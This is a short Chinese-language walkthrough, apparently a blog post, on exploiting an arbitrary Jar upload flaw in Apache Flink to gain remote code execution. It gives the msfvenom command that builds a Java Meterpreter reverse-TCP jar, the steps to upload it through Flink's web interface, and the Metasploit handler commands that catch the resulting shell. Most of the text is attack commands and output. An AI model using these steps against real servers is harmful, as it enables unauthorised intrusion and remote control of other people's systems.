近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞.
打开一个使用 Apache Flink 的网站,打开后页面为这样子
点击查看文件上传页面
bb05ef9f-f86f-4bb5-bbcb-c13424d7aca4
打开MSF 生成一个 jar 木马
msfvenom -p java/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f jar > test.jar
点击 Add 上传 jar 文件
3
监听端口
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/shell/reverse_tcp
payload => java/shell/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
lhost => xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
4
点击下 submit